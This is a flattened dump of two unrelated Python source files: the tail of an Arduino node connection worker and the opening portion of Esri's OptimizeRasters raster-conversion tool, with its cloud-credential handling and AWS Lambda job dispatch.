self.node_connected,
self.connection, self.api)
# Make the relays available, this event is toggled off elsewhere if we need to disable relays
relayState['available'].set()
self.relay_index += 1
self.workers.append(arw)
time.sleep(3)
except KeyError:
Logger.log(LOG_LEVEL["info"],
'{name} Node Relays...\t\t\033[1;31m Disabled\033[0;0m'.format(
**self.config))
try:
if self.config['sensors'] is not None:
asw = ArduinoSensorWorker(self.config, main_thread_running,
system_ready, self.node_connected,
self.connection, self.api)
self.workers.append(asw)
time.sleep(3)
except KeyError:
Logger.log(LOG_LEVEL["info"],
'{name} Node Sensors...\t\t\033[1;31m Disabled\033[0;0m'.format(
**self.config))
return
def connect(self):
attempts = 3
conn = None
if self.config.get('use_wifi', False):
while attempts > 0 and self.main_thread_running.is_set():
try:
Logger.log(LOG_LEVEL["debug"],
'\033[1;36m{0}\033[0;0m -> Connecting... \t'.format(
self.config["name"], (3 - attempts)))
attempts -= 1
conn = SocketManager(
host=str(self.config.get('address', 'mudpi.local')))
# Test the connection with api
self.api = ArduinoApi(connection=conn)
except (
SocketManagerError, BrokenPipeError, ConnectionResetError,
socket.timeout) as e:
Logger.log(LOG_LEVEL["warning"],
'{name} -> Connecting...\t\t\033[1;33m Timeout\033[0;0m '.format(
**self.config))
if attempts > 0:
Logger.log(LOG_LEVEL["info"],
'{name} -> Preparing Reconnect... \t'.format(
**self.config))
else:
Logger.log(LOG_LEVEL["error"],
'{name} -> Connection Attempts...\t\033[1;31m Failed\033[0;0m '.format(
**self.config))
conn = None
self.resetConnection()
time.sleep(15)
except (OSError, KeyError) as e:
Logger.log(LOG_LEVEL["error"],
'[{name}] \033[1;33m Node Not Found. (Is it online?)\033[0;0m'.format(
**self.config))
conn = None
self.resetConnection()
time.sleep(15)
else:
Logger.log(LOG_LEVEL["info"],
'{name} -> Wifi Connection \t\t\033[1;32m Success\033[0;0m '.format(
**self.config))
for worker in self.workers:
worker.connection = conn
self.node_connected.set()
self.node_ready.set()
break
else:
while attempts > 0 and self.main_thread_running.is_set():
try:
attempts -= 1
conn = SerialManager(
device=str(self.config.get('address', '/dev/ttyUSB1')))
except SerialManagerError:
Logger.log(LOG_LEVEL["warning"],
'{name} -> Connecting...\t\t\033[1;33m Timeout\033[0;0m '.format(
**self.config))
if attempts > 0:
Logger.log(LOG_LEVEL["info"],
'{name} -> Preparing Reconnect... \t'.format(
**self.config), end='\r', flush=True)
else:
Logger.log(LOG_LEVEL["error"],
'{name} -> Connection Attempts...\t\033[1;31m Failed\033[0;0m '.format(
**self.config))
self.resetConnection()
conn = None
time.sleep(15)
else:
if conn is not None:
Logger.log(LOG_LEVEL["info"],
'[{name}] Serial Connection \t\033[1;32m Success\033[0;0m '.format(
**self.config))
for worker in self.workers:
worker.connection = conn
self.node_connected.set()
self.node_ready.set()
break
return conn
def resetConnection(self):
self.connection = None
self.node_connected.clear()
self.node_ready.clear()
def run(self):
for worker in self.workers:
t = worker.run()
self.threads.append(t)
time.sleep(1)
t = threading.Thread(target=self.work, args=())
t.start()
if self.node_ready.is_set():
Logger.log(LOG_LEVEL["info"], str(
self.config['name']) + ' Node Worker ' + '[S: ' + str(
len(self.config.get('sensors', []))) + ']' + '[C: ' + str(len(
self.config.get('controls',
[]))) + ']...\t\033[1;32m Online\033[0;0m')
else:
Logger.log(LOG_LEVEL["info"], str(self.config[
'name']) + '...\t\t\t\t\033[1;33m Pending Reconnect\033[0;0m ')
return t
def work(self):
delay_multiplier = 1
while self.main_thread_running.is_set():
if self.system_ready.is_set() and self.node_ready.is_set():
if not self.node_connected.is_set():
# Connection Broken - Reset Connection
self.resetConnection()
Logger.log(LOG_LEVEL["warning"],
'\033[1;36m{name}\033[0;0m -> \033[1;33mTimeout!\033[0;0m \t\t\t\033[1;31m Connection Broken\033[0;0m'.format(
**self.config))
time.sleep(30)
else:
# Node reconnection cycle
if not self.node_connected.is_set():
# Random delay before connections to offset multiple attempts (1-5 min delay)
random_delay = (random.randrange(30, self.config.get(
"max_reconnect_delay", 300)) * delay_multiplier) / 2
time.sleep(10)
Logger.log(LOG_LEVEL["info"], '\033[1;36m' + str(
self.config[
'name']) + '\033[0;0m -> Retrying in ' + '{0}s...'.format(
random_delay) + '\t\033[1;33m Pending Reconnect\033[0;0m ')
# Two separate checks for main thread event to prevent re-connections during shutdown
if self.main_thread_running.is_set():
time.sleep(random_delay)
if self.main_thread_running.is_set():
self.connection = self.connect()
if self.connection is None:
delay_multiplier += 1
if delay_multiplier > 6:
delay_multiplier = 6
else:
delay_multiplier = 1
# Main loop delay between cycles
time.sleep(self.sleep_duration)
# This is only ran after the main thread is shut down
# Join all our sub threads for shutdown
for thread in self.threads:
thread.join()
Logger.log(LOG_LEVEL["info"], (
"{name} Shutting Down...\t\t\033[1;32m Complete\033[0;0m".format(
**self.config)))
|
OptimizeRasters.py | # ------------------------------------------------------------------------------
# Copyright 2021 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
# Name: OptimizeRasters.py
# Description: Optimizes rasters via gdal_translate/gdaladdo
# Version: 20211010
# Requirements: Python
# Required Arguments: -input -output
# Optional Arguments: -mode -cache -config -quality -prec -pyramids
# -tempinput -tempoutput -subs -clouddownload -cloudupload
# -inputprofile -outputprofile -op -job -inputprofile -outputprofile
# -inputbucket -outputbucket -rasterproxypath -clouddownloadtype -clouduploadtype
# -usetoken
# Usage: python.exe OptimizeRasters.py <arguments>
# Note: OptimizeRasters.xml (config) file is placed alongside OptimizeRasters.py
# OptimizeRasters.py is entirely case-sensitive, extensions/paths in the config
# file are case-sensitive and the program will fail if the correct paths are not
# entered at the cmd-line/UI or in the config file.
# Author: Esri Imagery Workflows team
# ------------------------------------------------------------------------------
# !/usr/bin/env python
# IMPORTANT> Set (CRUN_IN_AWSLAMBDA) to (True) when the OptimizeRasters.py is used within the (lambda_function.zip) to act as a lambda function.
import tarfile
import mimetypes
import fnmatch
from datetime import datetime, timedelta
import binascii
import hashlib
import json
import ctypes
import math
import argparse
import shutil
import subprocess
from xml.dom import minidom
import time
import threading
import mmap
import base64
import os
import sys
def getBooleanValue(value):
if (value is None):
return False
if (isinstance(value, bool)):
return value
val = value
if (not isinstance(val, str)):
val = str(val)
val = val.lower()
if val in ['true', 'yes', 't', '1', 'y']:
return True
return False
CRUN_IN_AWSLAMBDA = getBooleanValue(
os.environ.get('OR_RUNTIME_AWSLAMBDA', False))
CDISABLE_GDAL_CHECK = getBooleanValue(os.environ.get('OR_DISABLE_GDAL', False))
CDisableVersionCheck = getBooleanValue(
os.environ.get('OR_DISABLE_VER_CHECK', False))
if (sys.version_info[0] < 3):
import ConfigParser
from urllib import urlopen, urlencode
else:
import configparser as ConfigParser
from urllib.request import urlopen
from urllib.parse import urlencode
# ends
# enum error codes
eOK = 0
eFAIL = 1
# ends
CEXEEXT = '.exe'
CONST_OUTPUT_EXT = '.%s' % ('mrf')
CloudOGTIFFExt = '.cogtiff'
COGTIFFAuxFile = '.tif.cogtiff.aux.xml'
UpdateOrjobStatus = 'updateOrjobStatus'
CreateOverviews = 'createOverviews'
DefJpegQuality = 85
# const related to (Reporter) class
CRPT_SOURCE = 'SOURCE'
CRPT_COPIED = 'COPIED'
CRPT_PROCESSED = 'PROCESSED'
CRPT_UPLOADED = 'UPLOADED'
CRPT_HEADER_KEY = 'config'
CPRT_HANDLER = 'handler_resume_reporter'
CRPT_YES = 'yes'
CRPT_NO = 'no'
CRPT_UNDEFINED = ''
# ends
# user hsh const
USR_ARG_UPLOAD = 'upload'
USR_ARG_DEL = 'del'
# ends
# PL
CPLANET_IDENTIFY = 'api.planet.com'
SigAlibaba = 'aliyuncs.com'
# Del delay
CDEL_DELAY_SECS = 20
# ends
CPRJ_NAME = 'ProjectName'
CLOAD_RESTORE_POINT = '__LOAD_RESTORE_POINT__'
CCMD_ARG_INPUT = '__CMD_ARG_INPUT__'
CVSICURL_PREFIX = '/vsicurl/'
# utility const
CSIN_UPL = 'SIN_UPL'
CINC_SUB = 'INC_SUB'
COP_UPL = 'upload'
COP_DNL = 'download'
COP_RPT = 'report'
COP_NOCONVERT = 'noconvert'
COP_LAMBDA = 'lambda'
COP_COPYONLY = 'copyonly'
COP_CREATEJOB = 'createjob'
# ends
# clone specific
CCLONE_PATH = 'clonepath'
# ends
# -cache path
CCACHE_PATH = 'cache'
# ends
# resume constants
CRESUME = '_RESUME_'
CRESUME_MSG_PREFIX = '[Resume]'
CRESUME_ARG = 'resume'
CRESUME_ARG_VAL_RETRYALL = 'retryall'
CRESUME_HDR_INPUT = 'input'
CRESUME_HDR_OUTPUT = 'output'
InputProfile = 'inputprofile'
OutputProfile = 'outputprofile'
# ends
CINPUT_PARENT_FOLDER = 'Input_ParentFolder'
CUSR_TEXT_IN_PATH = 'hashkey'
CRASTERPROXYPATH = 'rasterproxypath'
CTEMPOUTPUT = 'tempoutput'
CTEMPINPUT = 'tempinput'
CISTEMPOUTPUT = 'istempoutput'
CISTEMPINPUT = 'istempinput'
CHASH_DEF_INSERT_POS = 2
CHASH_DEF_CHAR = '#'
CHASH_DEF_SPLIT_CHAR = '@'
UseToken = 'usetoken'
UseTokenOnOuput = 'usetokenonoutput'
CTimeIt = 'timeit'
# const node-names in the config file
CCLOUD_AMAZON = 'amazon'
CCLOUD_AZURE = 'azure'
CCLOUD_GOOGLE = 'google'
CDEFAULT_TIL_PROCESSING = 'DefaultTILProcessing'
# Azure constants
COUT_AZURE_PARENTFOLDER = 'Out_Azure_ParentFolder'
COUT_AZURE_ACCOUNTNAME = 'Out_Azure_AccountName'
COUT_AZURE_ACCOUNTKEY = 'Out_Azure_AccountKey'
COUT_AZURE_CONTAINER = 'Out_Azure_Container'
COUT_AZURE_ACCESS = 'Out_Azure_Access'
COUT_AZURE_PROFILENAME = 'Out_Azure_ProfileName'
CIN_AZURE_PARENTFOLDER = 'In_Azure_ParentFolder'
CIN_AZURE_CONTAINER = 'In_Azure_Container'
COP = 'Op'
# ends
# google constants
COUT_GOOGLE_BUCKET = 'Out_Google_Bucket'
COUT_GOOGLE_PROFILENAME = 'Out_Google_ProfileName'
CIN_GOOGLE_PARENTFOLDER = 'In_Google_ParentFolder'
COUT_GOOGLE_PARENTFOLDER = 'Out_Google_ParentFolder'
# ends
CCLOUD_UPLOAD_THREADS = 20 # applies to both (azure and amazon/s3)
CCLOUD_UPLOAD = 'CloudUpload'
CCLOUD_UPLOAD_OLD_KEY = 'Out_S3_Upload'
COUT_CLOUD_TYPE = 'Out_Cloud_Type'
COUT_S3_PARENTFOLDER = 'Out_S3_ParentFolder'
COUT_S3_ACL = 'Out_S3_ACL'
CIN_S3_PARENTFOLDER = 'In_S3_ParentFolder'
CIN_S3_PREFIX = 'In_S3_Prefix'
CIN_CLOUD_TYPE = 'In_Cloud_Type'
COUT_VSICURL_PREFIX = 'Out_VSICURL_Prefix'
CINOUT_S3_DEFAULT_DOMAIN = 's3.amazonaws.com'
DefS3Region = 'us-east-1'
COUT_DELETE_AFTER_UPLOAD_OBSOLETE = 'Out_S3_DeleteAfterUpload'
COUT_DELETE_AFTER_UPLOAD = 'DeleteAfterUpload'
CFGLogPath = 'LogPath'
TarGz = 'tarGz'
TarGzExt = '.tar.gz'
# ends
# const
CCFG_FILE = 'OptimizeRasters.xml'
CCFG_GDAL_PATH = 'GDALPATH'
# ends
# til related
CTIL_EXTENSION_ = '.til'
# ends
CCACHE_EXT = '.mrf_cache'
CMRF_DOC_ROOT = 'MRF_META' # <{CMRF_DOC_ROOT}> mrf XML root node
CMRF_DOC_ROOT_LEN = len(CMRF_DOC_ROOT) + 2 # includes '<' and '>' in XML node.
# global dbg flags
CS3_MSG_DETAIL = False
CS3_UPLOAD_RETRIES = 3
# ends
# S3Storage direction
CS3STORAGE_IN = 0
CS3STORAGE_OUT = 1
# ends
class TimeIt(object):
Name = 'Name'
Conversion = 'Conversion'
Overview = 'Overview'
Download = 'Download'
Upload = 'Upload'
def __init__(self):
pass
@staticmethod
def timeOperation(func):
def wrapper(*args, **kwargs):
sTime = time.time()
result = func(*args, **kwargs)
if (not result):
return result
eTime = time.time()
if ('name' in kwargs):
if (kwargs['name'] is None):
return result
prevIndex = -1
for i in range(0, len(kwargs['store'].timedInfo['files'])):
if kwargs['name'] in kwargs['store'].timedInfo['files'][i][TimeIt.Name]:
prevIndex = i
break
if (prevIndex == -1):
kwargs['store'].timedInfo['files'].append(
{TimeIt.Name: kwargs['name']})
prevIndex = len(kwargs['store'].timedInfo['files']) - 1
method = 'processing' # default method
if ('method' in kwargs):
method = kwargs['method']
if ('store' in kwargs):
kwargs['store'].timedInfo['files'][prevIndex][method] = '%.3f' % (
eTime - sTime)
return result
return wrapper
class UI(object):
def __init__(self, profileName=None):
self._profileName = profileName
self._errorText = []
self._availableBuckets = []
@property
def errors(self):
return iter(self._errorText)
class ProfileEditorUI(UI):
TypeAmazon = 'amazon'
TypeAzure = 'azure'
TypeGoogle = 'google'
TypeAlibaba = 'alibaba'
def __init__(self, profileName, storageType, accessKey, secretkey, credentialProfile=None, **kwargs):
super(ProfileEditorUI, self).__init__(profileName)
self._accessKey = accessKey
self._secretKey = secretkey
self._storageType = storageType
self._credentialProfile = credentialProfile
self._properties = kwargs
def validateCredentials(self):
try:
azure_storage = None
if (self._storageType == self.TypeAmazon or
self._storageType == self.TypeAlibaba):
import boto3
import botocore.config
import botocore
session = boto3.Session(self._accessKey, self._secretKey,
profile_name=self._credentialProfile if self._credentialProfile else None)
awsCredentials = ConfigParser.RawConfigParser()
rootPath = '.aws'
AwsEndpoint = 'aws_endpoint_url'
if (self._credentialProfile):
if (self._storageType == self.TypeAlibaba):
rootPath = '.OptimizeRasters/Alibaba'
userHome = '{}/{}/{}'.format(os.path.expanduser(
'~').replace('\\', '/'), rootPath, 'credentials')
awsCredentials.read(userHome)
if (not awsCredentials.has_section(self._credentialProfile)):
return False
endPoint = awsCredentials.get(self._credentialProfile, AwsEndpoint) if awsCredentials.has_option(
self._credentialProfile, AwsEndpoint) else None
if (AwsEndpoint in self._properties):
endPoint = self._properties[AwsEndpoint]
useAlibaba = endPoint and endPoint.lower().find(SigAlibaba) != -1
con = session.resource('s3', endpoint_url=endPoint, config=botocore.config.Config(
s3={'addressing_style': 'virtual'}))
# this will throw if credentials are invalid.
[self._availableBuckets.append(i.name)
for i in con.buckets.all()]
elif(self._storageType == self.TypeAzure):
azure_storage = Azure(
self._accessKey, self._secretKey, self._credentialProfile, None)
azure_storage.init()
# this will throw.
[self._availableBuckets.append(
i.name) for i in azure_storage._blobSrvCli.list_containers()]
elif(self._storageType == self.TypeGoogle):
with open(self._profileName, 'r') as reader:
serviceJson = json.load(reader)
Project_Id = 'project_id'
if (Project_Id not in serviceJson):
raise Exception(
'(Project_Id) key isn\'t found in file ({})'.format(self._profileName))
os.environ['GCLOUD_PROJECT'] = serviceJson[Project_Id]
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = self._profileName
try:
from google.cloud import storage
gs = storage.Client()
except Exception as e:
self._errorText.append(str(e))
return False
[self._availableBuckets.append(bucket.name)
for bucket in gs.list_buckets()]
else:
raise Exception('Invalid storage type')
except Exception as e:
MsgInvalidCredentials = 'Invalid Credentials>'
if (self._storageType == self.TypeAmazon or
self._storageType == self.TypeAlibaba):
try:
from botocore.exceptions import ClientError
except ImportError as e:
self._errorText.append(str(e))
return False
if (isinstance(e, ClientError)):
exCode = e.response['Error']['Code'].lower()
if (exCode not in ['invalidaccesskeyid', 'signaturedoesnotmatch']):
# the user may not have the access rights to list buckets but the bucket keys/contents could be accessed if the bucket name is known.
return True
elif(exCode in ['accessdenied']):
# the user has valid credentials but without the bucketlist permission.
return True
elif(self._storageType == self.TypeAzure):
if (azure_storage):
# It's assumed, SAS string credentials aren't allowed to list buckets and the bucket name is picked from the SAS string.
if (azure_storage._SASToken):
self._availableBuckets.append(azure_storage._SASBucket)
return True
self._errorText.append(MsgInvalidCredentials)
self._errorText.append(str(e))
return False
return True
class OptimizeRastersUI(ProfileEditorUI):
def __init__(self, profileName, storageType):
super(OptimizeRastersUI, self).__init__(
profileName, storageType, None, None, profileName)
def getAvailableBuckets(self):
ret = self.validateCredentials()
response = {'response': {'results': ret, 'buckets': []}}
if (not ret):
return response
response['response']['buckets'] = self._availableBuckets
return response
class MEMORYSTATUSEX(ctypes.Structure):
_fields_ = [
("dwLength", ctypes.c_ulong),
("dwMemoryLoad", ctypes.c_ulong),
("ullTotalPhys", ctypes.c_ulonglong),
("ullAvailPhys", ctypes.c_ulonglong),
("ullTotalPageFile", ctypes.c_ulonglong),
("ullAvailPageFile", ctypes.c_ulonglong),
("ullTotalVirtual", ctypes.c_ulonglong),
("ullAvailVirtual", ctypes.c_ulonglong),
("sullAvailExtendedVirtual", ctypes.c_ulonglong),
]
def __init__(self):
self.dwLength = ctypes.sizeof(self)
super(MEMORYSTATUSEX, self).__init__()
self.isLinux = os.name == 'posix'
self.CMINSIZEALLOWED = 5242880
def memoryStatus(self):
if (not self.isLinux):
ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(self))
return self
def getFreeMem(self):
if (self.isLinux):
try:
return int(int(os.popen("free -b").readlines()[1].split()[2]) * .01)
except Exception as e:
return self.CMINSIZEALLOWED
# download file isn't split in chunks, for now usage is set to 0.01
return int(self.memoryStatus().ullAvailPhys * .01)
def memoryPerDownloadChunk(self):
return self.getFreeMem()
# get upload payload size per thread for the total cloud upload threads required.
def memoryPerUploadChunk(self, totalThreads):
memPerChunk = self.getFreeMem() / totalThreads
if (memPerChunk < self.CMINSIZEALLOWED):
memPerChunk = self.CMINSIZEALLOWED
return memPerChunk
class Lambda:
account_name = 'aws_access_key_id'
account_key = 'aws_secret_access_key'
account_region = 'region'
account_sns = 'sns_arn'
queue_length = 'queuelength'
def __init__(self, base=None):
self._sns_aws_access_key = \
self._sns_aws_secret_access_key = None
self._sns_region = 'us-east-1'
self._sns_ARN = None
self._sns_connection = None
self._aws_credentials = None # aws credential file.
self._base = base
def initSNS(self, keyProfileName):
if (not keyProfileName):
return False
self._aws_credentials = ConfigParser.RawConfigParser()
userHome = '{}/{}/{}'.format(os.path.expanduser(
'~').replace('\\', '/'), '.aws', 'credentials')
with open(userHome) as fptr:
self._aws_credentials.read_file(fptr)
if (not self._aws_credentials.has_section(keyProfileName)):
return False
self._sns_aws_access_key = self._aws_credentials.get(
keyProfileName, self.account_name) if self._aws_credentials.has_option(keyProfileName, self.account_name) else None
self._sns_aws_secret_access_key = self._aws_credentials.get(
keyProfileName, self.account_key) if self._aws_credentials.has_option(keyProfileName, self.account_key) else None
if (self._aws_credentials.has_option(keyProfileName, self.account_region)):
self._sns_region = self._aws_credentials.get(
keyProfileName, self.account_region)
self._sns_ARN = self._aws_credentials.get(keyProfileName, self.account_sns) if self._aws_credentials.has_option(
keyProfileName, self.account_sns) else None
if (not self._sns_aws_access_key or
not self._sns_aws_secret_access_key):
return False
try:
import boto3
session = boto3.Session(aws_access_key_id=self._sns_aws_access_key,
aws_secret_access_key=self._sns_aws_secret_access_key, region_name=self._sns_region)
self._sns_connection = session.resource('sns')
self._sns_connection.meta.client.get_topic_attributes(
TopicArn=self._sns_ARN)
except ImportError as e:
self._base.message('({})/Lambda'.format(str(e)),
self._base.const_critical_text)
return False
except Exception as e:
self._base.message('SNS/init\n{}'.format(str(e)),
self._base.const_critical_text)
return False
return True
def _updateCredentials(self, doc, direction='In'):
inProfileNode = doc.getElementsByTagName(
'{}_S3_AWS_ProfileName'.format(direction))
inKeyIDNode = doc.getElementsByTagName('{}_S3_ID'.format(direction))
inKeySecretNode = doc.getElementsByTagName(
'{}_S3_Secret'.format(direction))
rptProfile = self._base.getUserConfiguration.getValue(
'{}_S3_AWS_ProfileName'.format(direction))
# gives a chance to overwrite the profile name in the parameter file with the orjob one.
_resumeReporter = self._base.getUserConfiguration.getValue(
CPRT_HANDLER)
# unless the orjob was edited manually, the profile name on both would be the same.
if (_resumeReporter):
selectProfile = InputProfile if direction == 'In' else OutputProfile
if (selectProfile in _resumeReporter._header):
rptProfile = _resumeReporter._header[selectProfile]
CERR_MSG = 'Credential keys don\'t exist/invalid'
if ((not len(inProfileNode) or
not inProfileNode[0].hasChildNodes() or
not inProfileNode[0].firstChild) and
not rptProfile):
if (not len(inKeyIDNode) or
not len(inKeySecretNode)):
self._base.message(CERR_MSG, self._base.const_critical_text)
return False
if (not inKeyIDNode[0].hasChildNodes() or
not inKeyIDNode[0].firstChild):
self._base.message(CERR_MSG, self._base.const_critical_text)
return False
else:
keyProfileName = rptProfile if rptProfile else inProfileNode[0].firstChild.nodeValue
if (not self._aws_credentials.has_section(keyProfileName)):
return False
parentNode = doc.getElementsByTagName('Defaults')
if (not len(parentNode)):
self._base.message('Unable to update credentials',
self._base.const_critical_text)
return False
_sns_aws_access_key = self._aws_credentials.get(
keyProfileName, self.account_name) if self._aws_credentials.has_option(keyProfileName, self.account_name) else None
_sns_aws_secret_access_key = self._aws_credentials.get(
keyProfileName, self.account_key) if self._aws_credentials.has_option(keyProfileName, self.account_key) else None
if (len(inKeyIDNode)):
if (inKeyIDNode[0].hasChildNodes() and
inKeyIDNode[0].firstChild.nodeValue):
_sns_aws_access_key = inKeyIDNode[0].firstChild.nodeValue
parentNode[0].removeChild(inKeyIDNode[0])
inKeyIDNode = doc.createElement('{}_S3_ID'.format(direction))
inKeyIDNode.appendChild(
doc.createTextNode(str(_sns_aws_access_key)))
parentNode[0].appendChild(inKeyIDNode)
if (len(inKeySecretNode)):
if (inKeySecretNode[0].hasChildNodes() and
inKeySecretNode[0].firstChild.nodeValue):
_sns_aws_secret_access_key = inKeySecretNode[0].firstChild.nodeValue
parentNode[0].removeChild(inKeySecretNode[0])
inKeySecretNode = doc.createElement(
'{}_S3_Secret'.format(direction))
inKeySecretNode.appendChild(
doc.createTextNode(str(_sns_aws_secret_access_key)))
parentNode[0].appendChild(inKeySecretNode)
if (inProfileNode.length):
parentNode[0].removeChild(inProfileNode[0])
if (not _sns_aws_access_key or
not _sns_aws_secret_access_key):
self._base.message(CERR_MSG, self._base.const_critical_text)
return False
return True
def submitJob(self, orjob):
if (not self._sns_connection or
not orjob):
return False
_orjob = Report(Base())
if (not _orjob.init(orjob) or
not _orjob.read()):
self._base.message('Job file read error',
self._base.const_critical_text)
return False
orjobName = os.path.basename(orjob)
orjobWOExt = orjobName.lower().replace(Report.CJOB_EXT, '')
configPath = _orjob._header['config']
configName = '{}.xml'.format(orjobWOExt)
if (CTEMPINPUT in _orjob._header):
_orjob._header[CTEMPINPUT] = '/tmp/{}/tempinput'.format(orjobWOExt)
if (CTEMPOUTPUT in _orjob._header):
_orjob._header[CTEMPOUTPUT] = '/tmp/{}/tempoutput'.format(
orjobWOExt)
if (CRASTERPROXYPATH in _orjob._header):
_orjob._header['store{}'.format(
CRASTERPROXYPATH)] = _orjob._header[CRASTERPROXYPATH]
_orjob._header[CRASTERPROXYPATH] = '/tmp/{}/{}'.format(
orjobWOExt, CRASTERPROXYPATH)
if ('config' in _orjob._header):
_orjob._header['config'] = '/tmp/{}'.format(configName)
configContent = ''
try:
with open(configPath, 'rb') as f:
configContent = f.read()
except Exception as e:
self._base.message('{}'.format(str(e)),
self._base.const_critical_text)
return False
try:
doc = minidom.parseString(configContent)
# skip looking into the parameter file for credentials if the input is a direct HTTP link with no reqruirement to pre-download the raster/file before processing.
if (not _orjob._isInputHTTP):
if (not self._updateCredentials(doc, 'In')):
return False
if (not self._updateCredentials(doc, 'Out')):
return False
configContent = doc.toprettyxml()
except Exception as e:
self._base.message(str(e), self._base.const_critical_text)
return False
orjobHeader = ''
for hdr in _orjob._header:
# lambda works with AWS key pairs and not profile names.
if (hdr in [InputProfile, OutputProfile]):
continue
orjobHeader += '# {}={}\n'.format(hdr, _orjob._header[hdr])
length = len(_orjob._input_list)
jobQueue = self._base.getUserConfiguration.getValue(self.queue_length)
if (not jobQueue):
# read from orjob/reporter if not in at cmd-line
jobQueue = _orjob._header[self.queue_length] if self.queue_length in _orjob._header else None
if (not jobQueue or
jobQueue and
(jobQueue <= 0 or
jobQueue > length)):
jobQueue = length
i = 0
errLambda = False
functionJobs = []
functionName = None
useLambdaFunction = False
lambdaArgs = _orjob.operation.split(':')
if (len(lambdaArgs) > 2):
if (lambdaArgs[1].lower() == 'function'):
# preserve case in lambda functions.
functionName = lambdaArgs[2]
useLambdaFunction = True
self._base.message('Invoke using ({})'.format(
'Function' if useLambdaFunction else 'SNS'))
while(i < length):
orjobContent = ''
for j in range(i, i + jobQueue):
if (j == length):
break
f = _orjob._input_list[j]
if (f.endswith('/')):
i += 1
continue # skip folder entries
if (not orjobContent):
orjobContent += orjobHeader
orjobContent += '{}\n'.format(f)
i += 1
if (not orjobContent):
continue
store = {'orjob': {'file': '{}_{}{}'.format(orjobWOExt, i, Report.CJOB_EXT), 'content': orjobContent}, 'config': {
'file': configName, 'content': configContent}}
message = json.dumps(store)
if (useLambdaFunction):
functionJobs.append(message)
else:
if (not self.invokeSNS(message)):
errLambda = True
if (useLambdaFunction and
not self.invokeFunction(functionName, functionJobs)):
errLambda = True
return not errLambda
def invokeSNS(self, message):
publish = None
try:
publish = self._sns_connection.meta.client.publish(
TopicArn=self._sns_ARN, Message=message, Subject='OR')
CPUBLISH_META = 'ResponseMetadata'
if (CPUBLISH_META in publish and
'RequestId' in publish[CPUBLISH_META]):
self._base.message('Lambda working on the (RequestID) [{}]...'.format(
publish[CPUBLISH_META]['RequestId']))
except Exception as e:
self._base.message('{}'.format(str(e)),
self._base.const_critical_text)
return False
return True
def invokeFunction(self, functionName, message):
if (not functionName or
not message):
return False
try:
payloads = []
MaxJobs = len(message)
for i in range(0, MaxJobs):
payload = {'Records': [{'Sns': {'Message': message[i]}}]}
payloads.append(payload)
timeStart = datetime.now()
pool = ThreadPool(LambdaFunction, base=self._base, function_name=functionName,
aws_access_key_id=self._sns_aws_access_key, aws_secret_access_key=self._sns_aws_secret_access_key)
pool.init(maxWorkers=100)
for i in range(0, len(payloads)):
pool.addWorker(payloads[i], i)
pool.run()
self._base.getUserConfiguration.getValue(
CPRT_HANDLER).write() # update .orjob status
self._base.message('duration> {}s'.format(
(datetime.now() - timeStart).total_seconds()))
if (pool.isErrorDetected):
return False
except Exception as e:
self._base.message('{}'.format(str(e)),
self._base.const_critical_text)
return False
return True
class LambdaFunction(threading.Thread):
Base = 'base'
def __init__(self, kwargs):
threading.Thread.__init__(self)
self.daemon = True
self.function = None
self.kwargs = kwargs
self.result = None
self.base = None
if (self.Base in kwargs and
isinstance(kwargs[self.Base], Base)):
self.base = kwargs[self.Base]
pass
def init(self, payload, jobID=0):
FunctionName = 'function_name'
if (FunctionName in self.kwargs):
self.function = self.kwargs[FunctionName]
if (self.function is None):
return False
self.payload = payload
self.jobID = jobID
return True
@property
def response(self):
return self.result
def message(self, message, messageType=0):
if (self.base is not None):
if (hasattr(self.base, 'message')):
return self.base.message(message, messageType)
print(message)
def run(self):
try:
import boto3
import boto3.session
session = boto3.session.Session()
client = session.client('lambda', aws_access_key_id=self.kwargs['aws_access_key_id'] if 'aws_access_key_id' in self.kwargs else None,
aws_secret_access_key=self.kwargs['aws_secret_access_key'] if 'aws_secret_access_key' in self.kwargs else None)
self.result = client.invoke(FunctionName=self.function, InvocationType='RequestResponse',
Payload=json.dumps(self.payload))
respJSON = json.loads(self.result['Payload'].read())
if (not respJSON):
return None
respStatus = respJSON['status'] if 'status' in respJSON else None
if (self.base is not None):
report = self.base.getUserConfiguration.getValue(CPRT_HANDLER)
report.syncRemoteToLocal(respJSON)
self.message(
'Completed/{}/Status [{}]'.format(self.jobID, str(respStatus)))
except Exception as e:
# 2 for critical
self.message('{}'.format(
e), self.base.const_critical_text if self.base else 2)
if (self.base is not None):
self.base.getUserConfiguration.setValue(
CCFG_LAMBDA_INVOCATION_ERR, True)
return False
return True
class ThreadPool(object):
DefMaxWorkers = 1
Job = 'job'
JobID = 'jobID'
Base = 'base'
def __init__(self, function, **kwargs):
self.maxWorkers = self.DefMaxWorkers
self.function = function
self.kwargs = kwargs
self.base = None
if (self.Base in kwargs and
isinstance(kwargs[self.Base], Base)):
self.base = kwargs[self.Base]
self.work = []
self._isErrorDetected = False
def init(self, maxWorkers=DefMaxWorkers):
try:
self.maxWorkers = int(maxWorkers)
if (self.maxWorkers < 1):
self.maxWorkers = self.DefMaxWorkers
except BaseException:
self.maxWorkers = self.DefMaxWorkers
def addWorker(self, job, jobID=None):
self.work.append({self.Job: job, self.JobID: jobID})
def message(self, message, messageType=0):
if (self.base is not None):
if (hasattr(self.base, 'message')):
return self.base.message(message, messageType)
print(message)
@property
def isErrorDetected(self):
return self._isErrorDetected
def run(self):
lenBuffer = self.maxWorkers
threads = []
workers = 0
maxWorkers = len(self.work)
while(1):
len_threads = len(threads)
while(len_threads):
alive = [t.is_alive() for t in threads]
countDead = sum(not x for x in alive)
if (countDead):
lenBuffer = countDead
threads = [t for t in threads if t.is_alive()]
break
buffer = []
for i in range(0, lenBuffer):
if (workers == maxWorkers):
break
buffer.append(self.work[workers])
workers += 1
if (not buffer and
not threads):
break
for f in buffer:
try:
t = self.function(self.kwargs)
isJobID = self.JobID in f
if (not t.init(f[self.Job], f[self.JobID] if isJobID else 0)):
return False
t.daemon = True
if (isJobID):
self.message('Started/{}'.format(f[self.JobID]))
t.start()
threads.append(t)
except Exception as e:
self.message(str(e))
continue
if (self.base is not None):
